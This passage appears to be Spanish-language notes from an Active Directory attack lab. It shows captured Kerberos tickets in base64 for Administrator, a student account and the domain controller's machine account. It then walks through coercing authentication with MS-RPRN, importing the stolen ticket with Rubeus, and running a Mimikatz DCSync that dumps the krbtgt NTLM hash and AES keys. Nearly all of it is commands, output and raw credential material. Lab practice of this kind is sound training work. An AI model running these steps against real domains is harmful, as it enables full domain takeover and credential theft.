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
[*] Ticket cache size: 17
[*] 3/2/2024 11:59:13 PM UTC - Found new TGT:
User : student723@DOLLARCORP.MONEYCORP.LOCAL
StartTime : 3/2/2024 3:59:11 PM
EndTime : 3/2/2024 8:45:28 PM
RenewTill : 3/9/2024 10:45:28 AM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
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
[*] 3/2/2024 11:59:13 PM UTC - Found new TGT:
User : DCORP-DC$@DOLLARCORP.MONEYCORP.LOCAL
StartTime : 3/2/2024 3:22:36 PM
EndTime : 3/3/2024 1:22:36 AM
RenewTill : 3/9/2024 5:51:58 AM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
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
[*] Ticket cache size: 19
[*] 3/2/2024 11:59:18 PM UTC - Found new TGT:
User : Administrator@DOLLARCORP.MONEYCORP.LOCAL
StartTime : 3/2/2024 3:59:13 PM
EndTime : 3/3/2024 1:59:12 AM
RenewTill : 3/9/2024 3:59:12 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
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
[*] Ticket cache size: 20
[*] 3/3/2024 12:00:13 AM UTC - Found new TGT:
User : Administrator@DOLLARCORP.MONEYCORP.LOCAL
StartTime : 3/2/2024 4:00:12 PM
EndTime : 3/3/2024 2:00:12 AM
RenewTill : 3/9/2024 4:00:12 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
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Y en una terminal normal de nuestor usuario estudiante lanzamos el ataque en MS-RPRN.
PS C:\ad\Tools> .\MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local
RpcRemoteFindFirstPrinterChangeNotificationEx failed.Error Code 1722 - The RPC server is unavailable.
Luego de obtener el ticket lo decodificamos en b64 e importamos.
PS C:\AD\Tools\tickets> $base64Content = Get-Content -Path "dc-pc.b64.txt"
PS C:\AD\Tools\tickets> [System.Convert]::FromBase64String($base64Content) | Set-Content -Path "dc-pc.kirbi" -Encoding Byte
PS C:\AD\Tools\tickets> klist
Current LogonId is 0:0x17ce62
Cached Tickets: (0)
PS C:\AD\Tools\tickets> ..\Rubeus.exe ptt /ticket:dc-pc.kirbi
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.1
[*] Action: Import Ticket
[+] Ticket successfully imported!
PS C:\AD\Tools\tickets> klist
Current LogonId is 0:0x17ce62
Cached Tickets: (1)
#0> Client: DCORP-DC$ @ DOLLARCORP.MONEYCORP.LOCAL
Server: krbtgt/DOLLARCORP.MONEYCORP.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
Start Time: 3/2/2024 15:22:36 (local)
End Time: 3/3/2024 1:22:36 (local)
Renew Time: 3/9/2024 5:51:58 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
Ahora, podemos cargar el comando de dcsync.
PS C:\AD\Tools\tickets> Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
.#####. mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(powershell) # lsadump::dcsync /user:dcorp\krbtgt
[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'dcorp\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 9:59:41 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID : 502
Credentials:
Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986
ntlm- 0: 4e9815869d2090ccfca61c1fe0d23986
lm - 0: ea03581a1268674a828bde6ab09db837
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 6d4cc4edd46d8c3d3e59250c91eac2bd
* Primary:Kerberos-Newer-Keys *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848
aes128_hmac (4096) : e74fa5a9aa05b2c0b2d196e226d8820e
des_cbc_md5 (4096) : 150ea2e934ab6b80
* Primary:Kerberos *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Credentials
des_cbc_md5 : 150ea2e934ab6b80
* Packages *
NTLM-Strong-NTOWF
* Primary:WDigest *
01 a0e60e247b498de4cacfac3ba615af01
02 86615bb9bf7e3c731ba1cb47aa89cf6d
03 637dfb61467fdb4f176fe844fd260bac
04 a0e60e247b498de4cacfac3ba615af01
05 86615bb9bf7e3c731ba1cb47aa89cf6d
06 d2874f937df1fd2b05f528c6e715ac7a
07 a0e60e247b498de4cacfac3ba615af01
08 e8ddc0d55ac23e847837791743b89d22
09 e8ddc0d55ac23e847837791743b89d22
10 5c324b8ab38cfca7542d5befb9849fd9
11 f84dfb60f743b1368ea571504e34863a
12 e8ddc0d55ac23e847837791743b89d22
13 2281b35faded13ae4d78e33a1ef26933
14 f84dfb60f743b1368ea571504e34863a
15 d9ef5ed74ef473e89a570a10a706813e
16 d9ef5ed74ef473e89a570a10a706813e
17 87c75daa20ad259a6f783d61602086aa
18 f0016c07fcff7d479633e8998c75bcf7
19 7c4e5eb0d5d517f945cf22d74fec380e
20 cb97816ac064a567fe37e8e8c863f2a7
21 5adaa49a00f2803658c71f617031b385
22 5adaa49a00f2803658c71f617031b385
23 6d86f0be7751c8607e4b47912115bef2
24 caa61bbf6b9c871af646935febf86b95
25 caa61bbf6b9c871af646935febf86b95
26 5d8e8f8f63b3bb6dd48db5d0352c194c
27 3e139d350a9063db51226cfab9e42aa1
28 d745c0538c8fd103d71229b017a987ce
29 40b43724fa76e22b0d610d656fb49ddd
Last updated
